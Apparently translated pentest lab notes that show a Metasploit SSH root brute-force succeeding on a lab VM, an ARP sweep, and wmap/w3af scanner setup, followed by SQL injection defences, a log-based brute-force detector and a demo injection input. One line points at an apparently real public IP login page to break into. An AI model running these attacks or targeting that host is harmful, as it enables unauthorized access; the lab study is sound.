VERBOSE true yes Whether to print output for all attempts
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE /root/passwd    // first create a password file named passwd in root's home directory
PASS_FILE => /root/passwd
msf auxiliary(ssh_login) > set THREADS 50
THREADS => 50
msf auxiliary(ssh_login) > set RHOSTS 10.10.10.129
RHOSTS => 10.10.10.129
msf auxiliary(ssh_login) > run
[*] 10.10.10.129:22 SSH - Starting bruteforce
[*] 10.10.10.129:22 SSH - [1/3] - Trying: username: 'root' with password: 'ahbieid'
[-] 10.10.10.129:22 SSH - [1/3] - Failed: 'root':'ahbieid'
[*] 10.10.10.129:22 SSH - [2/3] - Trying: username: 'root' with password: 'xideoejd'
[-] 10.10.10.129:22 SSH - [2/3] - Failed: 'root':'xideoejd'
[*] 10.10.10.129:22 SSH - [3/3] - Trying: username: 'root' with password: 'owaspbwa'
[*] Command shell session 1 opened (10.10.10.128:40157 -> 10.10.10.129:22) at 2015-03-14 13:51:30 +0800
[+] 10.10.10.129:22 SSH - [3/3] - Success: 'root':'owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Password guessing succeeded.
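The server-side view of the run above, as an added example that is not part of the original notes: a small Python analyzer over sshd auth-log lines. The sample lines are constructed (syslog format, which carries no year, so the year is passed in) and modelled on the session message above, with the scanner's address 10.10.10.128 as the source. It flags a source that either bursts failed logins inside a time window or gets an accepted login shortly after failures, which is what the third attempt above looks like in the target's log.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd lines modelled on the run above: two failed
# passwords for root, then an accepted one, all from the same source.
SAMPLE_AUTH_LOG = """\
Mar 14 13:51:28 owaspbwa sshd[2201]: Failed password for root from 10.10.10.128 port 40155 ssh2
Mar 14 13:51:29 owaspbwa sshd[2203]: Failed password for root from 10.10.10.128 port 40156 ssh2
Mar 14 13:51:30 owaspbwa sshd[2205]: Accepted password for root from 10.10.10.128 port 40157 ssh2
Mar 14 14:02:10 owaspbwa sshd[2310]: Accepted publickey for deploy from 10.10.10.5 port 51000 ssh2
Mar 14 14:03:00 owaspbwa sshd[2311]: Received disconnect from 10.10.10.5: 11: disconnected by user
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse_line(line, year=2015):
    """Parse one sshd auth line into an event dict; None for unrelated lines.
    Syslog timestamps have no year, so the caller supplies it."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, threshold=3, window_seconds=60, year=2015):
    """Flag source IPs that (a) reach `threshold` failed logins inside any
    `window_seconds` window, or (b) get an accepted login within the window
    after at least one failure, the signature of a successful guess."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line, year)
        if ev:
            by_ip[ev["ip"]].append(ev)

    findings = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        failures = [e["ts"] for e in events if e["result"] == "Failed"]

        # Sliding window over the sorted failure timestamps.
        max_in_window, start = 0, 0
        for end in range(len(failures)):
            while (failures[end] - failures[start]).total_seconds() > window_seconds:
                start += 1
            max_in_window = max(max_in_window, end - start + 1)

        # An accepted login from the same source within the window after a failure.
        success_after_failures = any(
            e["result"] == "Accepted"
            and any(0 <= (e["ts"] - f).total_seconds() <= window_seconds for f in failures)
            for e in events
        )

        if max_in_window >= threshold or success_after_failures:
            findings[ip] = {
                "max_failures_in_window": max_in_window,
                "burst": max_in_window >= threshold,
                "success_after_failures": success_after_failures,
                "users": sorted({e["user"] for e in events}),
            }
    return findings


if __name__ == "__main__":
    for ip, finding in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, finding)
```

With the default threshold of 3 the two failures alone are not a burst, but the accepted login one second after them is flagged; lowering the threshold to 2 flags the burst as well. The lone publickey login from 10.10.10.5 produces no finding.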
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Host discovery lab:
msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target address range or CIDR identifier
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    5                yes       The number of seconds to wait for new data

msf auxiliary(arp_sweep) > set RHOSTS 10.10.10.0/24
RHOSTS => 10.10.10.0/24
msf auxiliary(arp_sweep) > set THREADS 50
THREADS => 50
msf auxiliary(arp_sweep) > run
[*] 10.10.10.1 appears to be up (VMware, Inc.).
[*] 10.10.10.2 appears to be up (VMware, Inc.).
[*] 10.10.10.129 appears to be up (VMware, Inc.).
[*] 10.10.10.130 appears to be up (VMware, Inc.).
[*] 10.10.10.254 appears to be up (VMware, Inc.).
[*] 10.10.10.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Network scanning: OpenVAS, etc.
Web scanning
1. Under modules/auxiliary, wmap: load wmap (initializes wmap)
   wmap_sites -a http://XXX (scan with wmap); wmap_sites -l
   wmap_targets -t http://XXXX
   wmap_run -t (after it runs, wmap calls the configured auxiliary modules to scan the target; then view the results); wmap_run -e vunls ??
www.exploit-db.com
www.netasploit.com/modules packetstormsecurity.org
cd /usr/share/w3af/
A very practical scanning tool: w3af (w3af_console)
plugins
audit xss (cross-site scripting) sql (SQL injection) vulnerabilities
back
plugins
output html_file, console
output config html_file
set output_file 123.html
set verbose True
back
back
plugins
crawl web_spider
crawl config web_spider
set only_forward True
set follow_regex .*
set ignore_regex
back
back
target
set target http://www.dvssc.com/mutillidae/
back
SQL injection key points: parameterized queries; filtering (whitelist);
encoding (used to bypass anti-injection filtering); MySQL wide-byte (multibyte) injection;
second-order input (treat every input as hostile); error handling (inputs that trigger error messages);
least privilege (at present very many databases run as root; see WooYun (乌云)).
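The first points above carried through in runnable code, as an added example that is not from the original notes: a login query assembled with string formatting beside its parameterized form, a whitelist for a column name (identifiers cannot be bound as parameters), and generic error handling that does not echo the database error to the user. The in-memory sqlite3 table, the accounts and the `' --` input are constructed for the demonstration; passwords are stored in clear only to keep the demo short.

```python
import sqlite3


def make_db():
    """Constructed demo schema and accounts; not a real application's data."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (name, password, role) VALUES (?, ?, ?)",
        [("admin", "s3cret", "admin"), ("alice", "wonderland", "user")],
    )
    return conn


def login_vulnerable(conn, name, password):
    """The mistake the notes warn about: user input is formatted straight into
    the SQL text, so a quote character in `name` rewrites the WHERE clause."""
    sql = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, name, password):
    """Parameterized query: values travel separately from the SQL, so a quote
    in the input is just a character in the compared value. Database errors
    are handled generically instead of being returned to the caller."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    try:
        row = conn.execute(sql, (name, password)).fetchone()
    except sqlite3.Error:
        return None  # log server-side; never hand the DB error text to the user
    return row[0] if row else None


# Identifiers (table/column names) cannot be bound as parameters, so this is
# where the "filtering (whitelist)" point applies: accept only known-good names.
ALLOWED_SORT_COLUMNS = {"name", "role"}


def list_users_sorted(conn, sort_by):
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort column")
    return [r[0] for r in conn.execute(f"SELECT name FROM users ORDER BY {sort_by}")]


if __name__ == "__main__":
    db = make_db()
    crafted = "admin' --"  # constructed input: closes the quote, comments out the rest
    print("vulnerable   :", login_vulnerable(db, crafted, "wrong"))     # admin
    print("parameterized:", login_parameterized(db, crafted, "wrong"))  # None
    print(list_users_sorted(db, "name"))
```

The same rule applies to every query, including ones that reuse a value already stored in the database (the second-order case in the notes): a value that was stored safely through parameters becomes injectable again the moment it is formatted into later SQL text.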
http://218.206.165.70:8972/qhwxcs-djy/login.jsp once you find the username and password you can log in
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Scanning lab:
root@kali:~# cd /usr/share/w3af/
root@kali:/usr/share/w3af# w3af_console
w3af>>> plugins
w3af/plugins>>> help
|------------------------------------------------------------------------------------|
| list             | List available plugins.                                         |
|------------------------------------------------------------------------------------|
| back             | Go to the previous menu.                                        |
| exit             | Exit w3af.                                                      |
|------------------------------------------------------------------------------------|
| bruteforce       | View, configure and enable bruteforce plugins                   |
| infrastructure   | View, configure and enable infrastructure plugins               |
| evasion          | View, configure and enable evasion plugins                      |
| mangle           | View, configure and enable mangle plugins                       |
| audit            | View, configure and enable audit plugins                        |
| grep             | View, configure and enable grep plugins                         |
| output           | View, configure and enable output plugins                       |
| auth             | View, configure and enable auth plugins                         |
| crawl            | View, configure and enable crawl plugins                        |
|------------------------------------------------------------------------------------|
w3af/plugins>>> audit
|-----------------------------------------------------------------------------------|
| Plugin name     | Status | Conf | Description                                    |
|-----------------------------------------------------------------------------------|
| blind_sqli      |        | Yes  | Identify blind SQL injection                   |
|                 |        |      | vulnerabilities.                               |
| buffer_overflow |        |      | Find buffer overflow vulnerabilities.          |
| cors_origin     |        | Yes  | Inspect if application checks that the value   |
|                 |        |      | of the "Origin" HTTP header is consistent      |
|                 |        |      | with the value of the remote IP address/Host   |
|                 |        |      | of the sender of the incoming HTTP request.    |
| csrf            |        |      | Identify Cross-Site Request Forgery            |
|                 |        |      | vulnerabilities.                               |
| dav             |        |      | Verify if the WebDAV module is properly        |
|                 |        |      | configured.                                    |
| eval            |        | Yes  | Find insecure eval() usage.                    |
| file_upload     |        | Yes  | Uploads a file and then searches for the       |
|                 |        |      | file inside all known directories.             |
| format_string   |        |      | Find format string vulnerabilities.            |
| frontpage       |        |      | Tries to upload a file using frontpage         |
|                 |        |      | extensions (author.dll).                       |
| generic         |        | Yes  | Find all kind of bugs without using a fixed    |